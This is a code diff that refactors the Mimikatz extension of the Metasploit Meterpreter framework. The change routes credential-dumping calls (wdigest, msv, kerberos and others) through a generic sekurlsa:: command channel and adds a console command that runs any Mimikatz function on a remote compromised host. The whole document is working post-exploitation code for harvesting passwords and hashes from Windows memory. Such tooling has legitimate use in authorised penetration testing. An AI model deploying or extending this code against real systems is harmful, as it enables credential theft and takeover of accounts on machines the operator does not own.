Refactored to send custom commands

Author: Meatballs1

lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb

@@ -34,13 +34,17 @@ def initialize(client)
 			])
 	end
 
-	def mimikatz_send_request(method)
-		request = Packet.create_request(method)
+	def send_custom_command(function, args=[])
+		request = Packet.create_request('mimikatz_custom_command')
+		request.add_tlv(TLV_TYPE_MIMIKATZ_FUNCTION, function)
+		args.each do |a|
+			request.add_tlv(TLV_TYPE_MIMIKATZ_ARGUMENT, a)
+		end
 		response = client.send_request(request)
 		return Rex::Text.to_ascii(response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT))
 	end
 
-	def parse_mimikatz_result(result)
+	def parse_creds_result(result)
 		details = CSV.parse(result)
 		accounts  =  []
 		details.each do |acc|
@@ -56,7 +60,7 @@ def parse_mimikatz_result(result)
 		return accounts
 	end
 
-	def parse_mimikatz_ssp_result(result)
+	def parse_ssp_result(result)
 		details = CSV.parse(result)
 		accounts = []
 		details.each do |acc|
@@ -80,33 +84,33 @@ def parse_mimikatz_ssp_result(result)
 	end
 
 	def wdigest
-		result = mimikatz_send_request('mimikatz_wdigest')
-		return parse_mimikatz_result(result)
+		result = send_custom_command('sekurlsa::wdigest')
+		return parse_creds_result(result)
 	end
 
 	def msv
-		result = mimikatz_send_request('mimikatz_msv1_0')
-		return parse_mimikatz_result(result)
+		result = send_custom_command('sekurlsa::msv')
+		return parse_creds_result(result)
 	end
 
 	def livessp
-		result = mimikatz_send_request('mimikatz_livessp')
-		return parse_mimikatz_result(result)
+		result = send_custom_command('sekurlsa::livessp')
+		return parse_creds_result(result)
 	end
 
 	def ssp
-		result = mimikatz_send_request('mimikatz_ssp')
-		return parse_mimikatz_ssp_result(result)
+		result = send_custom_command('sekurlsa::ssp')
+		return parse_ssp_result(result)
 	end
 
 	def tspkg
-		result = mimikatz_send_request('mimikatz_tspkg')
-		return parse_mimikatz_result(result)
+		result = send_custom_command('sekurlsa::tspkg')
+		return parse_creds_result(result)
 	end
 
 	def kerberos
-		result = mimikatz_send_request('mimikatz_kerberos')
-		return parse_mimikatz_result(result)
+		result = send_custom_command('sekurlsa::kerberos')
+		return parse_creds_result(result)
 	end
 end
 

lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb

@@ -6,6 +6,8 @@ module Extensions
 module Mimikatz
 
 TLV_TYPE_MIMIKATZ_RESULT	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1)
+TLV_TYPE_MIMIKATZ_FUNCTION	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
+TLV_TYPE_MIMIKATZ_ARGUMENT	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
 
 end
 end

lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb

@@ -33,6 +33,7 @@ def initialize(shell)
 	#
 	def commands
 		{
+			"mimikatz_command" => "Run a custom commannd",
 			"wdigest" => "Attempt to retrieve wdigest creds",
 			"msv" => "Attempt to retrieve msv creds (hashes)",
 			"livessp" => "Attempt to retrieve livessp creds",
@@ -42,6 +43,50 @@ def commands
 		}
 	end
 
+	@@command_opts = Rex::Parser::Arguments.new(
+		"-f" => [true, "The function to pass to the command."],
+		"-a" => [true, "The arguments to pass to the command."],
+		"-h" => [false, "Help menu."]
+	)
+
+	def cmd_mimikatz_command(*args)
+		if (args.length == 0)
+			args.unshift("-h")
+		end
+
+		cmd_args = nil
+		cmd_func = nil
+		arguments = []
+
+		@@command_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-a"
+					cmd_args = val
+				when "-f"
+					cmd_func = val
+				when "-h"
+					print(
+						"Usage: mimikatz_command -f func -a args\n\n" +
+						"Executes a mimikatz command on the remote machine.\n" +
+						"e.g. mimikatz_command -f sekurlsa::wdigest -a \"full\"\n" +
+						@@command_opts.usage)
+					return true
+			end
+		}
+
+		unless cmd_func
+			print_error("You must specify a function with -f")
+			return true
+		end
+
+		if cmd_args
+			arguments = cmd_args.split(" ")
+		end
+
+		print client.mimikatz.send_custom_command(cmd_func, arguments)
+		print_line
+	end
+
 	def mimikatz_request(provider, method)
 		get_privs
 		print_status("Retrieving #{provider} credentials")